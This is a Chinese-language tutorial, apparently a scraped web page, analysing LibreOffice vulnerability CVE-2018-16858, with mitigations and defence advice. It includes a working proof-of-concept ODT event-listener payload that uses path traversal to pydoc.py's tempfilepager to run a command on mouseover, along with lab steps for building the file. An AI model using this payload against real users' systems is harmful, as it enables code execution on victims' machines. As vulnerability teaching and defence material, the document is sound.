LibreOffice 远程代码执行漏洞(CVE-2018-16858) 分析教学文档<\/h1>

漏洞概述<\/h2>
CVE-2018-16858 是 LibreOffice 中的一个远程代码执行漏洞，攻击者可以通过精心构造的 ODT 文档在受害者打开文件并执行特定操作（如鼠标悬停）时执行任意代码，且不会弹出任何安全警告。<\/p>

漏洞影响<\/h2>

影响版本<\/strong>：LibreOffice 6.1.2.1 及之前版本<\/li>
影响平台<\/strong>：Windows 和 Linux 系统<\/li>
攻击场景<\/strong>：用户只需打开恶意 ODT 文件并将鼠标移到特定位置<\/li>

安全限制绕过<\/strong>：无需用户确认，直接执行代码<\/li> <\/ul>
技术背景<\/h2>
ODT 文件结构<\/h3>
ODT 文件本质上是包含结构化描述文件的 ZIP 压缩包，类似于 DOCX 格式。关键元素包括：<\/p>

office:scripts<\/code> 元素：用于定义文档中的脚本<\/li>
script:event-listener<\/code> 元素：定义事件监听器<\/li> <\/ul> LibreOffice 脚本支持<\/h3> LibreOffice 支持多种脚本语言：<\/p> Basic<\/li> BeanShell<\/li> Java<\/li> JavaScript<\/li> Python<\/li> <\/ul> 漏洞原理<\/h2> 正常功能分析<\/h3> LibreOffice 允许通过以下方式嵌入脚本：<\/p> 通过界面插入：Writer → Insert → Hyperlink → 齿轮图标<\/li> 选择事件（如 onmouseover<\/code>）<\/li> 指定脚本语言和位置<\/li> <\/ol> 生成的 XML 结构示例：<\/p> <script:event-listener<\/span> <\/span><\/span> script:language=<\/span>"ooo:script"<\/span> <\/span><\/span> script:event-name=<\/span>"dom:mouseover"<\/span> <\/span><\/span> xlink:href=<\/span>"vnd.sun.star.script:pythonSamples|TableSample.py$createTable?language=Python&location=share"<\/span> <\/span><\/span> xlink:type=<\/span>"simple"<\/span>\/><\/span> <\/span><\/span><\/code><\/pre>其中 xlink:href<\/code> 指定了：<\/p> 脚本路径：pythonSamples|TableSample.py<\/code><\/li> 函数名：createTable<\/code><\/li> 语言：Python<\/li> 位置：share<\/code>（表示 LibreOffice 安装目录下的共享脚本）<\/li> <\/ul> 漏洞成因<\/h3> 路径遍历问题<\/strong>：攻击者可以修改 xlink:href<\/code> 属性，通过路径遍历技术指向系统任意位置的 Python 脚本<\/p> 修改后的恶意示例：<\/p> <script:event-listener<\/span> <\/span><\/span> script:language=<\/span>"ooo:script"<\/span> <\/span><\/span> script:event-name=<\/span>"dom:mouseover"<\/span> <\/span><\/span> xlink:href=<\/span>"vnd.sun.star.script:..\/..\/..\/..\/TableSample.py$createTable?language=Python&location=share"<\/span> <\/span><\/span> xlink:type=<\/span>"simple"<\/span>\/><\/span> <\/span><\/span><\/code><\/pre><\/li> 不安全函数调用<\/strong>：LibreOffice 自带的 Python 脚本中包含危险函数<\/p> 关键危险函数位于： C:\Program Files\LibreOffice\program\python-core-3.5.5\lib\pydoc.py<\/code><\/p> def<\/span> tempfilepager<\/span>(text, cmd): <\/span><\/span> """Page through text by invoking a program on a temporary file."""<\/span> <\/span><\/span> import<\/span> tempfile <\/span><\/span> filename =<\/span> tempfile.<\/span>mktemp() <\/span><\/span> with<\/span> open(filename, 'w'<\/span>, errors=<\/span>'backslashreplace'<\/span>) as<\/span> file: <\/span><\/span> file.<\/span>write(text) <\/span><\/span> try<\/span>: <\/span><\/span> os.<\/span>system(cmd +<\/span> ' "'<\/span> +<\/span> filename +<\/span> '"'<\/span>) <\/span><\/span> finally<\/span>: <\/span><\/span> os.<\/span>unlink(filename) <\/span><\/span><\/code><\/pre>此函数直接将用户控制的 cmd<\/code> 参数传递给 os.system()<\/code>，导致命令注入。<\/p> <\/li> <\/ol> 漏洞利用<\/h2> 利用步骤<\/h3> 构造恶意 ODT 文件，修改 script:event-listener<\/code> 元素：<\/p> <script:event-listener<\/span> <\/span><\/span> script:language=<\/span>"ooo:script"<\/span> <\/span><\/span> script:event-name=<\/span>"dom:mouseover"<\/span> <\/span><\/span> xlink:href=<\/span>"vnd.sun.star.script:program\/python-core-3.5.5\/lib\/pydoc.py$tempfilepager(1,calc.exe)?language=Python&location=share"<\/span> <\/span><\/span> xlink:type=<\/span>"simple"<\/span>\/><\/span> <\/span><\/span><\/code><\/pre><\/li> 当用户鼠标悬停在超链接上时：<\/p> LibreOffice 会加载 pydoc.py<\/code> 脚本<\/li> 调用 tempfilepager<\/code> 函数<\/li> 执行 os.system("calc.exe")<\/code><\/li> 弹出计算器（证明代码执行）<\/li> <\/ul> <\/li> <\/ol> 利用限制绕过<\/h3> location 参数尝试<\/strong>：<\/p> location=document<\/code>：会弹出禁用宏的警告<\/li> location=user<\/code>：尝试利用用户目录，但 ODT 文件头限制导致失败<\/li> <\/ul> <\/li> 最终方案<\/strong>：<\/p> 利用 LibreOffice 自带的危险 Python 函数<\/li> 通过路径遍历定位到系统敏感位置<\/li> <\/ul> <\/li> <\/ol> 漏洞修复<\/h2> 官方修复<\/h3> LibreOffice 官方已发布安全公告： https:\/\/www.libreoffice.org\/about-us\/security\/advisories\/cve-2018-16858\/<\/p> 修复措施包括：<\/p> 限制脚本加载路径<\/li> 增加安全警告机制<\/li> 审查自带脚本的安全性<\/li> <\/ol> 临时缓解措施<\/h3> 升级到最新版本<\/li> 禁用 LibreOffice 的脚本支持<\/li> 谨慎打开来源不明的 ODT 文件<\/li> <\/ol> 漏洞报告时间线<\/h2> 初始通过 bugzilla 上报<\/li> 被要求通过邮件发送至 officesecurity@lists.freedesktop.org<\/li> 经过重新审查后被确认<\/li> 最终修复并发布公告<\/li> <\/ol> 教学实验<\/h2> 实验环境搭建<\/h3> 安装易受攻击版本：LibreOffice 6.1.2.1<\/li> 准备 Windows 或 Linux 测试环境<\/li> 安装 ProcessMonitor（Windows）或 strace（Linux）用于监控<\/li> <\/ol> 实验步骤<\/h3> 创建正常 ODT 文件包含脚本事件监听器<\/li> 使用压缩工具解压 ODT 文件<\/li> 修改 content.xml<\/code> 中的 script:event-listener<\/code> 元素<\/li> 重新压缩为 ODT 文件<\/li> 在监控工具下打开文件并触发事件<\/li> <\/ol> 实验注意事项<\/h3> 必须在隔离环境中进行测试<\/li> 不要使用真实系统关键路径进行测试<\/li> 建议使用虚拟机和快照功能<\/li> <\/ol> 防御建议<\/h2> 用户层面<\/strong>：<\/p> 保持 LibreOffice 更新到最新版本<\/li> 不要打开不可信的 ODT 文件<\/li> 在沙箱环境中处理可疑文档<\/li> <\/ul> <\/li> 开发者层面<\/strong>：<\/p> 严格验证脚本加载路径<\/li> 实现安全的脚本执行沙箱<\/li> 审查所有自带脚本的安全性<\/li> 对危险函数调用增加警告机制<\/li> <\/ul> <\/li> 企业层面<\/strong>：<\/p> 部署文档安全网关<\/li> 监控异常 Office 进程行为<\/li> 制定文档处理安全规范<\/li> <\/ul> <\/li> <\/ol> 扩展研究<\/h2> 研究其他 Office 套件中的类似机制<\/li> 分析 ODF 标准中的安全考虑<\/li> 探索其他可能被利用的 Python 标准库函数<\/li> 研究跨平台利用的差异性<\/li> <\/ol> 总结<\/h2> CVE-2018-16858 展示了办公软件中脚本功能可能带来的严重安全风险，特别是在：<\/p> 路径验证不严格<\/li> 危险函数暴露<\/li> 安全警告缺失<\/li> <\/ol> 这种漏洞可以被用于针对性攻击，且隐蔽性高。防御需要多层次的安全措施，从软件本身的安全设计到用户的安全意识都至关重要。<\/p>

LibreOffice 远程代码执行漏洞(CVE-2018-16858) 分析教学文档<\/h1>

漏洞概述<\/h2> CVE-2018-16858 是 LibreOffice 中的一个远程代码执行漏洞，攻击者可以通过精心构造的 ODT 文档在受害者打开文件并执行特定操作（如鼠标悬停）时执行任意代码，且不会弹出任何安全警告。<\/p>

技术背景<\/h2>

漏洞原理<\/h2>

漏洞修复<\/h2>

教学实验<\/h2>

漏洞概述<\/h2>
CVE-2018-16858 是 LibreOffice 中的一个远程代码执行漏洞，攻击者可以通过精心构造的 ODT 文档在受害者打开文件并执行特定操作（如鼠标悬停）时执行任意代码，且不会弹出任何安全警告。<\/p>